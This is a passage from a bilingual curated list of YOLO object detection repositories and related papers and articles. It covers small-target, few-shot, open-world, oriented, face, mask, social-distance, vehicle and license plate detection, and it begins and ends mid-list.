"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[ๅŸบไบŽYOLOv5ๆ”น่ฟ›ๅ†่ฎพ่ฎก | M2Sๅ…จ้ขๆๅ‡ๅฐ็›ฎๆ ‡็ฒพๅบฆ](https://mp.weixin.qq.com/s/FlKgYYGUHtJAxCF2wrh4NA)ใ€‹". - [ultralytics/xview-yolov3](https://github.com/ultralytics/xview-yolov3) <img src="https://img.shields.io/github/stars/ultralytics/xview-yolov3?style=social"/> : xView 2018 Object Detection Challenge: YOLOv3 Training and Inference. - [inderpreet1390/yolov5-small-target](https://github.com/inderpreet1390/yolov5-small-target) <img src="https://img.shields.io/github/stars/inderpreet1390/yolov5-small-target?style=social"/> : Repository for improved yolov5 for small target detection. - [AllenSquirrel/YOLOv3_ReSAM](https://github.com/AllenSquirrel/YOLOv3_ReSAM) <img src="https://img.shields.io/github/stars/AllenSquirrel/YOLOv3_ReSAM?style=social"/> : YOLOv3_ReSAM:A Small Target Detection Method With Spatial Attention Module. - [kadirnar/yolov5-sahi](https://github.com/kadirnar/yolov5-sahi) <img src="https://img.shields.io/github/stars/kadirnar/yolov5-sahi?style=social"/> : Yolov5 Modelini Kullanarak ร–zel Nesne EฤŸitimi ve SAHI Kullanฤฑmฤฑ. - [kadirnar/Yolov6-SAHI](https://github.com/kadirnar/Yolov6-SAHI) <img src="https://img.shields.io/github/stars/kadirnar/Yolov6-SAHI?style=social"/> : Yolov6-SAHI. - [zRzRzRzRzRzRzR/Mult-YOLO-alogorithm-of-RoboMaster-Radar-Detection-2023](https://github.com/zRzRzRzRzRzRzR/Mult-YOLO-alogorithm-of-RoboMaster-Radar-Detection-2023) <img src="https://img.shields.io/github/stars/zRzRzRzRzRzRzR/Mult-YOLO-alogorithm-of-RoboMaster-Radar-Detection-2023?style=social"/> : 2023ๅนด่ฅฟไบคๅˆฉ็‰ฉๆตฆๅคงๅญฆๅŠจไบ‘็ง‘ๆŠ€GMasterๆˆ˜้˜Ÿ้›ท่พพyoloๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ใ€‚ - ### Few-shot Object Detection #### ๅฐ‘ๆ ทๆœฌ็›ฎๆ ‡ๆฃ€ๆต‹ - [bingykang/Fewshot_Detection](https://github.com/bingykang/Fewshot_Detection) <img src="https://img.shields.io/github/stars/bingykang/Fewshot_Detection?style=social"/> : "Few-shot Object Detection via Feature Reweighting". (**[ICCV 2019](https://openaccess.thecvf.com/content_ICCV_2019/html/Kang_Few-Shot_Object_Detection_via_Feature_Reweighting_ICCV_2019_paper.html)**). - [SSDA-YOLO](https://github.com/hnuzhy/SSDA-YOLO) <img src="https://img.shields.io/github/stars/hnuzhy/SSDA-YOLO?style=social"/> : Codes for my paper "SSDA-YOLO: Semi-supervised Domain Adaptive YOLO for Cross-Domain Object Detection". (**[Computer Vision and Image Understanding, 2023](https://www.sciencedirect.com/science/article/abs/pii/S1077314223000292)**). - [OneTeacher](https://github.com/luogen1996/OneTeacher) <img src="https://img.shields.io/github/stars/luogen1996/OneTeacher?style=social"/> : "Towards End-to-end Semi-supervised Learning for One-stage Object Detection". (**[arXiv 2023](https://arxiv.org/abs/2302.11299)**). - [Efficient Teacher](https://github.com/AlibabaResearch/efficientteacher) <img src="https://img.shields.io/github/stars/AlibabaResearch/efficientteacher?style=social"/> : "Efficient Teacher: Semi-Supervised Object Detection for YOLOv5". (**[arXiv 2023](https://arxiv.org/abs/2302.07577)**). - ### Open World Object Detection #### ๅผ€ๆ”พไธ–็•Œ็›ฎๆ ‡ๆฃ€ๆต‹ - [UniDetector](https://github.com/zhenyuw16/UniDetector) <img src="https://img.shields.io/github/stars/zhenyuw16/UniDetector?style=social"/> : "Detecting Everything in the Open World: Towards Universal Object Detection". (**[CVPR 2023](https://arxiv.org/abs/2303.11749)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆˆ‘็ˆฑ่ฎก็ฎ—ๆœบ่ง†่ง‰ใ€ใ€Š[CVPR 2023 | ๆ ‡ๆณจ500็ฑป๏ผŒๆฃ€ๆต‹7000็ฑป๏ผๆธ…ๅŽๅคงๅญฆ็ญ‰ๆๅ‡บ้€š็”จ็›ฎๆ ‡ไปทๆต‹็ฎ—ๆณ•UniDetector](https://mp.weixin.qq.com/s/r7N8X_8riboCvafl9f1vDQ)ใ€‹". "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‡ชๅŠจ้ฉพ้ฉถไน‹ๅฟƒใ€ใ€Š[CVPR 2023๏ฝœUniDetector๏ผš7000็ฑป้€š็”จ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•๏ผˆๆธฏๅคง&ๆธ…ๅŽ๏ผ‰](https://mp.weixin.qq.com/s/iRe4RhSEm4Oe4DxKX5wu9w)ใ€‹" - [buxihuo/OW-YOLO](https://github.com/buxihuo/OW-YOLO) <img src="https://img.shields.io/github/stars/buxihuo/OW-YOLO?style=social"/> : Detect known and unknown objects in the open world๏ผˆๅ…ทๆœ‰ๅŒบๅˆ†ๅทฒ็ŸฅไธŽๆœช็Ÿฅ่ƒฝๅŠ›็š„ๅ…จๆ–ฐๆฃ€ๆต‹ๅ™จ๏ผ‰๏ผ‰. - ### Oriented Object Detection #### ๆ—‹่ฝฌ็›ฎๆ ‡ๆฃ€ๆต‹ - [AlphaRotate](https://github.com/yangxue0827/RotationDetection) <img src="https://img.shields.io/github/stars/yangxue0827/RotationDetection?style=social"/> : "AlphaRotate: A Rotation Detection Benchmark using TensorFlow". (**[arXiv 2021](https://arxiv.org/abs/2111.06677)**) - [hukaixuan19970627/yolov5_obb](https://github.com/hukaixuan19970627/yolov5_obb) <img src="https://img.shields.io/github/stars/hukaixuan19970627/yolov5_obb?style=social"/> : yolov5 + csl_label.(Oriented Object Detection)๏ผˆRotation Detection๏ผ‰๏ผˆRotated BBox๏ผ‰ๅŸบไบŽyolov5็š„ๆ—‹่ฝฌ็›ฎๆ ‡ๆฃ€ๆต‹ใ€‚ - [BossZard/rotation-yolov5](https://github.com/BossZard/rotation-yolov5) <img src="https://img.shields.io/github/stars/BossZard/rotation-yolov5?style=social"/> : rotation detection based on yolov5. - [acai66/yolov5_rotation](https://github.com/acai66/yolov5_rotation) <img src="https://img.shields.io/github/stars/acai66/yolov5_rotation?style=social"/> : rotated bbox detection. inspired by [hukaixuan19970627/yolov5_obb](https://github.com/hukaixuan19970627/yolov5_obb), thanks hukaixuan19970627. - [ming71/rotate-yolov3](https://github.com/ming71/rotate-yolov3) <img src="https://img.shields.io/github/stars/ming71/rotate-yolov3?style=social"/> : Arbitrary oriented object detection implemented with yolov3 (attached with some tricks). - [ming71/yolov3-polygon](https://github.com/ming71/yolov3-polygon) <img src="https://img.shields.io/github/stars/ming71/yolov3-polygon?style=social"/> : Arbitrary-oriented object detection based on yolov3. - [kunnnnethan/R-YOLOv4](https://github.com/kunnnnethan/R-YOLOv4) <img src="https://img.shields.io/github/stars/kunnnnethan/R-YOLOv4?style=social"/> : This is a PyTorch-based R-YOLOv4 implementation which combines YOLOv4 model and loss function from R3Det for arbitrary oriented object detection. - [XinzeLee/PolygonObjectDetection](https://github.com/XinzeLee/PolygonObjectDetection) <img src="https://img.shields.io/github/stars/XinzeLee/PolygonObjectDetection?style=social"/> : This repository is based on Ultralytics/yolov5, with adjustments to enable polygon prediction boxes. - [hukaixuan19970627/DOTA_devkit_YOLO](https://github.com/hukaixuan19970627/DOTA_devkit_YOLO) <img src="https://img.shields.io/github/stars/hukaixuan19970627/DOTA_devkit_YOLO?style=social"/> : Trans DOTA OBB format(poly format) to YOLO format. - [hpc203/rotate-yolov5-opencv-onnxrun](https://github.com/hpc203/rotate-yolov5-opencv-onnxrun) <img src="https://img.shields.io/github/stars/hpc203/rotate-yolov5-opencv-onnxrun?style=social"/> : ๅˆ†ๅˆซไฝฟ็”จOpenCVใ€ONNXRuntime้ƒจ็ฝฒyolov5ๆ—‹่ฝฌ็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒๅŒ…ๅซC++ๅ’ŒPythonไธคไธช็‰ˆๆœฌ็š„็จ‹ๅบใ€‚ - [hpc203/rotateyolov5-opencv-onnxrun](https://github.com/hpc203/rotateyolov5-opencv-onnxrun) <img src="https://img.shields.io/github/stars/hpc203/rotateyolov5-opencv-onnxrun?style=social"/> : ๅˆ†ๅˆซไฝฟ็”จOpenCV๏ผŒONNXRuntime้ƒจ็ฝฒyolov5ๆ—‹่ฝฌ็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒๅŒ…ๅซC++ๅ’ŒPythonไธคไธช็‰ˆๆœฌ็š„็จ‹ๅบใ€‚ - [kunnnnethan/R-YOLOv4](https://github.com/kunnnnethan/R-YOLOv4) <img src="https://img.shields.io/github/stars/kunnnnethan/R-YOLOv4?style=social"/> : This is a PyTorch-based R-YOLOv4 implementation which combines YOLOv4 model and loss function from R3Det for arbitrary oriented object detection. - [DDGRCF/YOLOX_OBB](https://github.com/DDGRCF/YOLOX_OBB) <img src="https://img.shields.io/github/stars/DDGRCF/YOLOX_OBB?style=social"/> : YOLOX OBB -- YOLOX ๆ—‹่ฝฌๆก† | ๅฎžไพ‹ๅˆ†ๅ‰ฒใ€‚ "็ŸฅไนŽใ€Œๅˆ€ๅˆ€็‹—ใ€ใ€Š[YOLOX OBB -- YOLOX ๆ—‹่ฝฌๆก†ๆฃ€ๆต‹ ่ถ…่ฏฆ็ป†๏ผ๏ผ๏ผ](https://zhuanlan.zhihu.com/p/430850089)ใ€‹"ใ€‚ - ### Face Detection and Recognition #### ไบบ่„ธๆฃ€ๆต‹ไธŽ่ฏ†ๅˆซ - #### Face Detection ##### ไบบ่„ธๆฃ€ๆต‹ - [YOLO5Face](https://github.com/deepcam-cn/yolov5-face) <img src="https://img.shields.io/github/stars/deepcam-cn/yolov5-face?style=social"/> : "YOLO5Face: Why Reinventing a Face Detector". (**[arXiv 2021](https://arxiv.org/abs/2105.12931)**) - [derronqi/yolov7-face](https://github.com/derronqi/yolov7-face) <img src="https://img.shields.io/github/stars/derronqi/yolov7-face?style=social"/> : yolov7 face detection with landmark. - [derronqi/yolov8-face](https://github.com/derronqi/yolov8-face) <img src="https://img.shields.io/github/stars/derronqi/yolov8-face?style=social"/> : yolov8 face detection with landmark. - [we0091234/yolov7-face-tensorrt](https://github.com/we0091234/yolov7-face-tensorrt) <img src="https://img.shields.io/github/stars/we0091234/yolov7-face-tensorrt?style=social"/> : yolov7-face TensorRT. - [YOLO-FaceV2](https://github.com/Krasjet-Yu/YOLO-FaceV2) <img src="https://img.shields.io/github/stars/Krasjet-Yu/YOLO-FaceV2?style=social"/> : "YOLO-FaceV2: A Scale and Occlusion Aware Face Detector ". (**[arXiv 2022](https://arxiv.org/abs/2208.02019)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๆฑŸๅคง็™ฝใ€ใ€Š[่ถ…่ถŠYolo5-Face๏ผŒYolo-Facev2ๅผ€ๆบ๏ผŒๅ„็ฑปTrickไผ˜ๅŒ–๏ผŒๅ€ผๅพ—ๅญฆไน ๏ผ](https://mp.weixin.qq.com/s?__biz=Mzg5NzgyNTU2Mg==&mid=2247498561&idx=1&sn=b7ff0592644ab6bc5b716e07294e1c0a&source=41#wechat_redirect)ใ€‹" - [OAID/TengineKit](https://github.com/OAID/TengineKit) <img src="https://img.shields.io/github/stars/OAID/TengineKit?style=social"/> : TengineKit - Free, Fast, Easy, Real-Time Face Detection & Face Landmarks & Face Attributes & Hand Detection & Hand Landmarks & Body Detection & Body Landmarks & Iris Landmarks & Yolov5 SDK On Mobile. - [xialuxi/yolov5_face_landmark](https://github.com/xialuxi/yolov5_face_landmark) <img src="https://img.shields.io/github/stars/xialuxi/yolov5_face_landmark?style=social"/> : ๅŸบไบŽyolov5็š„ไบบ่„ธๆฃ€ๆต‹๏ผŒๅธฆๅ…ณ้”ฎ็‚นๆฃ€ๆต‹ใ€‚ - [sthanhng/yoloface](https://github.com/sthanhng/yoloface) <img src="https://img.shields.io/github/stars/sthanhng/yoloface?style=social"/> : Deep learning-based Face detection using the YOLOv3 algorithm. - [DayBreak-u/yolo-face-with-landmark](https://github.com/DayBreak-u/yolo-face-with-landmark) <img src="https://img.shields.io/github/stars/DayBreak-u/yolo-face-with-landmark?style=social"/> : yolofaceๅคง็คผๅŒ… ไฝฟ็”จpytrochๅฎž็Žฐ็š„ๅŸบไบŽyolov3็š„่ฝป้‡็บงไบบ่„ธๆฃ€ๆต‹๏ผˆๅŒ…ๅซๅ…ณ้”ฎ็‚น๏ผ‰ใ€‚ - [abars/YoloKerasFaceDetection](https://github.com/abars/YoloKerasFaceDetection) <img src="https://img.shields.io/github/stars/abars/YoloKerasFaceDetection?style=social"/> : Face Detection and Gender and Age Classification using Keras. - [dannyblueliu/YOLO-Face-detection](https://github.com/dannyblueliu/YOLO-Face-detection) <img src="https://img.shields.io/github/stars/dannyblueliu/YOLO-Face-detection?style=social"/> : Face detection based on YOLO darknet. - [wmylxmj/YOLO-V3-IOU](https://github.com/wmylxmj/YOLO-V3-IOU) <img src="https://img.shields.io/github/stars/wmylxmj/YOLO-V3-IOU?style=social"/> : YOLO3 ๅŠจๆผซไบบ่„ธๆฃ€ๆต‹ (Based on keras and tensorflow) 2019-1-19. - [pranoyr/head-detection-using-yolo](https://github.com/pranoyr/head-detection-using-yolo) <img src="https://img.shields.io/github/stars/pranoyr/head-detection-using-yolo?style=social"/> : Detection of head using YOLO. - [grapeot/AnimeHeadDetector](https://github.com/grapeot/AnimeHeadDetector) <img src="https://img.shields.io/github/stars/grapeot/AnimeHeadDetector?style=social"/> : An object detector for character heads in animes, based on Yolo V3. - [Chenyang-ZHU/YOLOv3-Based-Face-Detection-Tracking](https://github.com/Chenyang-ZHU/YOLOv3-Based-Face-Detection-Tracking) <img src="https://img.shields.io/github/stars/Chenyang-ZHU/YOLOv3-Based-Face-Detection-Tracking?style=social"/> : This is a robot project for television live. System will tracking the host's face, making the face in the middle of the screen. - [zdfb/Yolov5_face](https://github.com/zdfb/Yolov5_face) <img src="https://img.shields.io/github/stars/zdfb/Yolov5_face?style=social"/> : ๅŸบไบŽpytorch็š„Yolov5ไบบ่„ธๆฃ€ๆต‹ใ€‚ - [jinfagang/yolov7-face](https://github.com/jinfagang/yolov7-face) <img src="https://img.shields.io/github/stars/jinfagang/yolov7-face?style=social"/> : Next Gen Face detection based on YOLOv7. - [Yusepp/YOLOv8-Face](https://github.com/Yusepp/YOLOv8-Face) <img src="https://img.shields.io/github/stars/Yusepp/YOLOv8-Face?style=social"/> : YOLOv8 for Face Detection. - #### Face Recognition ##### ไบบ่„ธ่ฏ†ๅˆซ - [ChanChiChoi/awesome-Face_Recognition](https://github.com/ChanChiChoi/awesome-Face_Recognition) <img src="https://img.shields.io/github/stars/ChanChiChoi/awesome-Face_Recognition?style=social"/> : papers about Face Detection; Face Alignment; Face Recognition && Face Identification && Face Verification && Face Representation; Face Reconstruction; Face Tracking; Face Super-Resolution && Face Deblurring; Face Generation && Face Synthesis; Face Transfer; Face Anti-Spoofing; Face Retrieval. - [hpc203/10kinds-light-face-detector-align-recognition](https://github.com/hpc203/10kinds-light-face-detector-align-recognition) <img src="https://img.shields.io/github/stars/hpc203/10kinds-light-face-detector-align-recognition?style=social"/> : 10็ง่ฝป้‡็บงไบบ่„ธๆฃ€ๆต‹็ฎ—ๆณ•็š„ๆฏ”ๆ‹ผ๏ผŒๅ…ถไธญ่ฟ˜ๅŒ…ๅซไบบ่„ธๅ…ณ้”ฎ็‚นๆฃ€ๆต‹ไธŽๅฏน้ฝ๏ผŒไบบ่„ธ็‰นๅพๅ‘้‡ๆๅ–ๅ’Œ่ฎก็ฎ—่ท็ฆป็›ธไผผๅบฆใ€‚ - [ooooxianyu/yoloV5-arcface_forlearn](https://github.com/ooooxianyu/yoloV5-arcface_forlearn) <img src="https://img.shields.io/github/stars/ooooxianyu/yoloV5-arcface_forlearn?style=social"/> : ็ฎ€ๅ•ๆ‹ผๆŽฅไธ€ไบ›ๆบ็ ๏ผŒๅฎž็Žฐ็š„ไบบ่„ธ่ฏ†ๅˆซ้กน็›ฎใ€‚ๅฏไพ›ๅญฆไน ๅ‚่€ƒใ€‚ๅ…ทไฝ“ไฝฟ็”จๅˆฐ๏ผšyolov5ไบบ่„ธๆฃ€ๆต‹ใ€arcfaceไบบ่„ธ่ฏ†ๅˆซใ€‚ - [zhouyuchong/face-recognition-deepstream](https://github.com/zhouyuchong/face-recognition-deepstream) <img src="https://img.shields.io/github/stars/zhouyuchong/face-recognition-deepstream?style=social"/> : Deepstream app use YOLO, retinaface and arcface for face recognition. - [duckzhao/face_detection_and_recognition_yolov5](https://github.com/duckzhao/face_detection_and_recognition_yolov5) <img src="https://img.shields.io/github/stars/duckzhao/face_detection_and_recognition_yolov5?style=social"/> : ไฝฟ็”จyolov5ๆž„ๅปบไบบ่„ธๆฃ€ๆต‹ๆจกๅž‹๏ผŒไฝฟ็”จ้ข„่ฎญ็ปƒ็š„ArcfaceๅฎŒๆˆไบบ่„ธ็‰นๅพๆๅ–ๅ’Œ่ฏ†ๅˆซใ€‚ - [PhucNDA/FaceID--YOLOV5.ArcFace](https://github.com/PhucNDA/FaceID--YOLOV5.ArcFace) <img src="https://img.shields.io/github/stars/PhucNDA/FaceID--YOLOV5.ArcFace?style=social"/> : ONNX implementation of YOLOv5 and Siamese Network (ResNet100) with ArcFace loss for Face Detection and Recognition. - ### Face Mask Detection #### ๅฃ็ฝฉๆฃ€ๆต‹ - [Bil369/MaskDetect-YOLOv4-PyTorch](https://github.com/Bil369/MaskDetect-YOLOv4-PyTorch) <img src="https://img.shields.io/github/stars/Bil369/MaskDetect-YOLOv4-PyTorch?style=social"/> : ๅŸบไบŽPyTorch&YOLOv4ๅฎž็Žฐ็š„ๅฃ็ฝฉไฝฉๆˆดๆฃ€ๆต‹ โญ ่‡ชๅปบๅฃ็ฝฉๆ•ฐๆฎ้›†ๅˆ†ไบซใ€‚ - [adityap27/face-mask-detector](https://github.com/adityap27/face-mask-detector) <img src="https://img.shields.io/github/stars/adityap27/face-mask-detector?style=social"/> : ๐‘๐ž๐š๐ฅ-๐“๐ข๐ฆ๐ž ๐…๐š๐œ๐ž ๐ฆ๐š๐ฌ๐ค ๐๐ž๐ญ๐ž๐œ๐ญ๐ข๐จ๐ง ๐ฎ๐ฌ๐ข๐ง๐  ๐๐ž๐ž๐ฉ๐ฅ๐ž๐š๐ซ๐ง๐ข๐ง๐  ๐ฐ๐ข๐ญ๐ก ๐€๐ฅ๐ž๐ซ๐ญ ๐ฌ๐ฒ๐ฌ๐ญ๐ž๐ฆ ๐Ÿ’ป๐Ÿ””. - [VictorLin000/YOLOv3_mask_detect](https://github.com/VictorLin000/YOLOv3_mask_detect) <img src="https://img.shields.io/github/stars/VictorLin000/YOLOv3_mask_detect?style=social"/> : Face mask detection using YOLOv3 on GoogleColab. - [amh28/IBM-Data-Science-Capstone-Alejandra-Marquez](https://github.com/amh28/IBM-Data-Science-Capstone-Alejandra-Marquez) <img src="https://img.shields.io/github/stars/amh28/IBM-Data-Science-Capstone-Alejandra-Marquez?style=social"/> : Homemade face mask detector fine-tuning a Yolo-v3 network. - [LorenRd/JetsonYolov4](https://github.com/LorenRd/JetsonYolov4) <img src="https://img.shields.io/github/stars/LorenRd/JetsonYolov4?style=social"/> : Face Mask Yolov4 detector - Nvidia Jetson Nano. - [Backl1ght/yolov4_face_mask_detection](https://github.com/Backl1ght/yolov4_face_mask_detection) <img src="https://img.shields.io/github/stars/Backl1ght/yolov4_face_mask_detection?style=social"/> : ๅŸบไบŽyolov4ๅฎž็Žฐๅฃ็ฝฉไฝฉๆˆดๆฃ€ๆต‹๏ผŒๅœจ้ชŒ่ฏ้›†ไธŠๅšๅˆฐไบ†0.954็š„mAPใ€‚ - [pritul2/yolov5_FaceMask](https://github.com/pritul2/yolov5_FaceMask) <img src="https://img.shields.io/github/stars/pritul2/yolov5_FaceMask?style=social"/> : Detecting person with or without face mask. Trained using YOLOv5. - [NisargPethani/FACE-MASK-DETECTION-USING-YOLO-V3](https://github.com/NisargPethani/FACE-MASK-DETECTION-USING-YOLO-V3) <img src="https://img.shields.io/github/stars/NisargPethani/FACE-MASK-DETECTION-USING-YOLO-V3?style=social"/> : FACE-MASK DETECTION. - [waittim/mask-detector](https://github.com/waittim/mask-detector) <img src="https://img.shields.io/github/stars/waittim/mask-detector?style=social"/> : Real-time video streaming mask detection based on Python. Designed to defeat COVID-19. - [BogdanMarghescu/Face-Mask-Detection-Using-YOLOv4](https://github.com/BogdanMarghescu/Face-Mask-Detection-Using-YOLOv4) <img src="https://img.shields.io/github/stars/BogdanMarghescu/Face-Mask-Detection-Using-YOLOv4?style=social"/> : Face Mask Detector using YOLOv4. - [xinghanliuying/yolov5_bus](https://github.com/xinghanliuying/yolov5_bus) <img src="https://img.shields.io/github/stars/xinghanliuying/yolov5_bus?style=social"/> : ๆ‰‹ๆŠŠๆ‰‹ๆ•™ไฝ ไฝฟ็”จYOLOV5่ฎญ็ปƒ่‡ชๅทฑ็š„็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹ใ€‚ - [song-laogou/yolov5-mask-42](https://gitee.com/song-laogou/yolov5-mask-42) : ๅŸบไบŽYOLOV5็š„ๅฃ็ฝฉๆฃ€ๆต‹็ณป็ปŸ-ๆไพ›ๆ•™ๅญฆ่ง†้ข‘ใ€‚ - ### Social Distance Detection #### ็คพไบค่ท็ฆปๆฃ€ๆต‹ - [Ank-Cha/Social-Distancing-Analyser-COVID-19](https://github.com/Ank-Cha/Social-Distancing-Analyser-COVID-19) <img src="https://img.shields.io/github/stars/Ank-Cha/Social-Distancing-Analyser-COVID-19?style=social"/> : Social Distancing Analyser to prevent COVID19. - [abd-shoumik/Social-distance-detection](https://github.com/abd-shoumik/Social-distance-detection) <img src="https://img.shields.io/github/stars/abd-shoumik/Social-distance-detection?style=social"/> : Social distance detection, a deep learning computer vision project with yolo object detection. - [ChargedMonk/Social-Distancing-using-YOLOv5](https://github.com/ChargedMonk/Social-Distancing-using-YOLOv5) <img src="https://img.shields.io/github/stars/ChargedMonk/Social-Distancing-using-YOLOv5?style=social"/> : Classifying people as high risk and low risk based on their distance to other people. - [JohnBetaCode/Social-Distancing-Analyser](https://github.com/JohnBetaCode/Social-Distancing-Analyser) <img src="https://img.shields.io/github/stars/JohnBetaCode/Social-Distancing-Analyser?style=social"/> : Social Distancing Analyzer. - [Ashamaria/Safe-distance-tracker-using-YOLOv3-v3](https://github.com/Ashamaria/Safe-distance-tracker-using-YOLOv3-v3) <img src="https://img.shields.io/github/stars/Ashamaria/Safe-distance-tracker-using-YOLOv3-v3?style=social"/> : Safe Distance Tracker. - ### Autonomous Driving Field Detection #### ่‡ชๅŠจ้ฉพ้ฉถ้ข†ๅŸŸๆฃ€ๆต‹ - #### Vehicle Detection ##### ่ฝฆ่พ†ๆฃ€ๆต‹ - [williamhyin/yolov5s_bdd100k](https://github.com/williamhyin/yolov5s_bdd100k) <img src="https://img.shields.io/github/stars/williamhyin/yolov5s_bdd100k?style=social"/> : Train a yolo v5 object detection model on Bdd100k dataset. - [Gaussian_YOLOv3](https://github.com/jwchoi384/Gaussian_YOLOv3) <img src="https://img.shields.io/github/stars/jwchoi384/Gaussian_YOLOv3?style=social"/> : "Gaussian YOLOv3: An Accurate and Fast Object Detector Using Localization Uncertainty for Autonomous Driving". (**[ICCV 2019](https://openaccess.thecvf.com/content_ICCV_2019/html/Choi_Gaussian_YOLOv3_An_Accurate_and_Fast_Object_Detector_Using_Localization_ICCV_2019_paper.html)**) - [streamlit/demo-self-driving](https://github.com/streamlit/demo-self-driving) <img src="https://img.shields.io/github/stars/streamlit/demo-self-driving?style=social"/> : Streamlit app demonstrating an image browser for the Udacity self-driving-car dataset with realtime object detection using YOLO. - [JunshengFu/vehicle-detection](https://github.com/JunshengFu/vehicle-detection) <img src="https://img.shields.io/github/stars/JunshengFu/vehicle-detection?style=social"/> : Created vehicle detection pipeline with two approaches: (1) deep neural networks (YOLO framework) and (2) support vector machines ( OpenCV + HOG). - [xslittlegrass/CarND-Vehicle-Detection](https://github.com/xslittlegrass/CarND-Vehicle-Detection) <img src="https://img.shields.io/github/stars/xslittlegrass/CarND-Vehicle-Detection?style=social"/> : Vehicle detection using YOLO in Keras runs at 21FPS. - [Kevinnan-teen/Intelligent-Traffic-Based-On-CV](https://github.com/Kevinnan-teen/Intelligent-Traffic-Based-On-CV) <img src="https://img.shields.io/github/stars/Kevinnan-teen/Intelligent-Traffic-Based-On-CV?style=social"/> : ๅŸบไบŽ่ฎก็ฎ—ๆœบ่ง†่ง‰็š„ไบค้€š่ทฏๅฃๆ™บ่ƒฝ็›‘ๆŽง็ณป็ปŸใ€‚ - [subodh-malgonde/vehicle-detection](https://github.com/subodh-malgonde/vehicle-detection) <img src="https://img.shields.io/github/stars/subodh-malgonde/vehicle-detection?style=social"/> : Detect vehicles in a video. - [CaptainEven/Vehicle-Car-detection-and-multilabel-classification](https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification) <img src="https://img.shields.io/github/stars/CaptainEven/Vehicle-Car-detection-and-multilabel-classification?style=social"/> : ไฝฟ็”จYOLO_v3_tinyๅ’ŒB-CNNๅฎž็Žฐ่ก—ๅคด่ฝฆ่พ†็š„ๆฃ€ๆต‹ๅ’Œ่ฝฆ่พ†ๅฑžๆ€ง็š„ๅคšๆ ‡็ญพ่ฏ†ๅˆซ Using yolo_v3_tiny to do vehicle or car detection and attribute's multilabel classification or recognizeใ€‚ - [kaylode/vehicle-counting](https://github.com/kaylode/vehicle-counting) <img src="https://img.shields.io/github/stars/kaylode/vehicle-counting?style=social"/> : Vehicle counting using Pytorch. - [MaryamBoneh/Vehicle-Detection](https://github.com/MaryamBoneh/Vehicle-Detection) <img src="https://img.shields.io/github/stars/MaryamBoneh/Vehicle-Detection?style=social"/> : Vehicle Detection Using Deep Learning and YOLO Algorithm. - [JeffWang0325/Image-Identification-for-Self-Driving-Cars](https://github.com/JeffWang0325/Image-Identification-for-Self-Driving-Cars) <img src="https://img.shields.io/github/stars/JeffWang0325/Image-Identification-for-Self-Driving-Cars?style=social"/> : This project achieves some functions of image identification for Self-Driving Cars. - [AnarbekovAlt/Traffic-analysis](https://github.com/AnarbekovAlt/Traffic-analysis) <img src="https://img.shields.io/github/stars/AnarbekovAlt/Traffic-analysis?style=social"/> : A traffic analysis system is built on the basis of the YOLO network. - [ruhyadi/yolov5-nodeflux](https://github.com/ruhyadi/yolov5-nodeflux) <img src="https://img.shields.io/github/stars/ruhyadi/yolov5-nodeflux?style=social"/> : YOLOv5 Nodeflux Vehicle Detection. - [Daheer/Driving-Environment-Detector](https://github.com/Daheer/Driving-Environment-Detector) <img src="https://img.shields.io/github/stars/Daheer/Driving-Environment-Detector?style=social"/> : Detecting road objects using YOLO CNN Architecture. - [georgia-tech-db/eva](https://github.com/georgia-tech-db/eva) <img src="https://img.shields.io/github/stars/georgia-tech-db/eva?style=social"/> : Exploratory Video Analytics System. - [heathhenley/RhodyCarCounter](https://github.com/heathhenley/RhodyCarCounter) <img src="https://img.shields.io/github/stars/heathhenley/RhodyCarCounter?style=social"/> : An app that uses Yolo to count the cars passing by traffic cams mostly in the Providence, RI area. - [zehengl/yyc-traffic-cam](https://github.com/zehengl/yyc-traffic-cam) <img src="https://img.shields.io/github/stars/zehengl/yyc-traffic-cam?style=social"/> : A demo to detect vehicles in traffic cam. [zehengl.github.io/yyc-traffic-cam/](https://zehengl.github.io/yyc-traffic-cam/) - [ruhyadi/vehicle-detection-yolov8](https://github.com/ruhyadi/vehicle-detection-yolov8) <img src="https://img.shields.io/github/stars/ruhyadi/vehicle-detection-yolov8?style=social"/> : Vehicle Detection with YOLOv8. - #### License Plate Detection and Recognition ##### ่ฝฆ็‰Œๆฃ€ๆต‹ไธŽ่ฏ†ๅˆซ - [zeusees/License-Plate-Detector](https://github.com/zeusees/License-Plate-Detector) <img src="https://img.shields.io/github/stars/zeusees/License-Plate-Detector?style=social"/> : License Plate Detection with Yolov5๏ผŒๅŸบไบŽYolov5่ฝฆ็‰Œๆฃ€ๆต‹ใ€‚ - [TheophileBuy/LicensePlateRecognition](https://github.com/TheophileBuy/LicensePlateRecognition) <img src="https://img.shields.io/github/stars/TheophileBuy/LicensePlateRecognition?style=social"/> : License Plate Recognition. - [alitourani/yolo-license-plate-detection](https://github.com/alitourani/yolo-license-plate-detection) <img src="https://img.shields.io/github/stars/alitourani/yolo-license-plate-detection?style=social"/> : A License-Plate detecttion application based on YOLO. - [HuKai97/YOLOv5-LPRNet-Licence-Recognition](https://github.com/HuKai97/YOLOv5-LPRNet-Licence-Recognition) <img src="https://img.shields.io/github/stars/HuKai97/YOLOv5-LPRNet-Licence-Recognition?style=social"/> : ไฝฟ็”จYOLOv5ๅ’ŒLPRNet่ฟ›่กŒ่ฝฆ็‰Œๆฃ€ๆต‹+่ฏ†ๅˆซ๏ผˆCCPDๆ•ฐๆฎ้›†๏ผ‰ใ€‚ - [xialuxi/yolov5-car-plate](https://github.com/xialuxi/yolov5-car-plate) <img src="https://img.shields.io/github/stars/xialuxi/yolov5-car-plate?style=social"/> : ๅŸบไบŽyolov5็š„่ฝฆ็‰Œๆฃ€ๆต‹๏ผŒๅŒ…ๅซ่ฝฆ็‰Œ่ง’็‚นๆฃ€ๆต‹ใ€‚ - [kyrielw24/License_Plate_Recognition](https://github.com/kyrielw24/License_Plate_Recognition) <img src="https://img.shields.io/github/stars/kyrielw24/License_Plate_Recognition?style=social"/> : 